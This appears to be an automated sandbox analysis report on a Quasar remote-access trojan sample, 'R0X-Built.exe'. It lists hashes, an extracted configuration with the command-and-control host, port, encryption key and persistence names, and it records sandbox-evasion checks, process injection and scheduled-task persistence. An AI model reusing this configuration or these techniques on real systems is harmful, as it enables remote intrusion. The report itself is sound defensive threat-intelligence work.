Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system -
submitted
02-05-2024 20:59
Behavioral task
behavioral1
Sample
R0X-Built.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
R0X-Built.exe
Resource
win10v2004-20240419-en
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
a0f5aa5764c4f66eee82f857f9f447b6
-
SHA1
3c3a780d020cb3eb3088223443fe813abb95dccd
-
SHA256
43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
-
SHA512
458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
SSDEEP
6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF
Malware Config
Extracted
quasar
3.1.5
Slave
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2868-1-0x0000000000D60000-0x0000000000DCC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4072 created 600 4072 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
Processes:
$srr-powershell.exeinstall.exepid process 1232 $srr-powershell.exe 4352 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 16 ip-api.com -
Drops file in System32 directory 15 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4072 set thread context of 2192 4072 powershell.EXE dllhost.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
SCHTASKS.exeschtasks.exeschtasks.exepid process 608 SCHTASKS.exe 4180 schtasks.exe 5040 schtasks.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
mousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEmousocoreworker.exeOfficeClickToRun.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 21:01:19 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={54A50278-E838-4F87-ABA1-852DCF90170A}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018000FED5919E3" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683678" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018000FED5919E3 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000e6e1f8e6da58da43b3e37d8f53ff339b00000000020000000000106600000001000020000000340636dcf9b61b48b6df80c4db69c2987340ccc9773b51e14d4858ff9dcd3b67000000000e80000000020000200000001f0718d3551ee5688c2f4cd938df6a4e3264ee1024df3c51081f32d1bd24bfbe8000000071fa3964328adbe60a979bb57af065c20a6aa12ae79e33180eaeed63d4df1ff704cefd5cc4004819934ede8c0cdbb1742b7883c585edff9e86d38a4b469cbb5ee1759da4483b9e0e48304d6acdbfcc34887c89b611450a72470659b9c6178fa04260e44de77dc02a42598f6a1e6081d428eb67ef2e4cc39197ae04ac07c8ef78400000006a31b6d1a5a71310dcca48a2b5e4436eac8bb94e1aa22d6ed2ebfd2a2461ede8d9579036cbbaf8fe0937a1cc72ca1dbfc6c4a10b438a26ddb18849f8e2d79db8 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE -
Modifies registry class 64 IoCs
Processes:
RuntimeBroker.exeRuntimeBroker.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\43f590a4e1c3925e7ca4f328bb0a96e53c3263c7b970bff556a1264954e67d64" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c28b2fe9-eb4a-43ac-909 = "0" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\2cc1f6f2-0113-43cd-a7b RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\65105ed8-d001-4cd3-adf = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\82b2a6e3845d7882014a9163a68b36151d22befbfbe4ab32fc70398b51a2fbfc" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b = "\\\\?\\Volume{42D85BE4-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\25b2fcee4b577958f2189d2620b00bf863fcac8f67927d11a92adafbe4ec1887" RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\df3850ad-bbc9-411e-9f7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4d63b6e2-41e6-4d37-816 = "8324" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\1c8f63d3-41b7-4280-a7b = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c28b2fe9-eb4a-43ac-909 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b8bd6278-bf50-4f8b-a6a RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\44b1ef29-803c-4918-95a = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5af8ea4f-0697-4706-915 = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000a27844e9d39cda01a27844e9d39cda01a27844e9d39cda01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000a25831a82000323362306239396366363833303733363233646165373931626439373263643333333064663736373730303837333136353565346132373866623335646565640000b20009000400efbea25831a8a25831a82e000000000000000000000000000000000000000000000000005e92ce00320033006200300062003900390063006600360038003300300037003300360032003300640061006500370039003100620064003900370032006300640033003300330030006400660037003600370037003000300038003700330031003600350035006500340061003200370038006600620033003500640065006500640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e00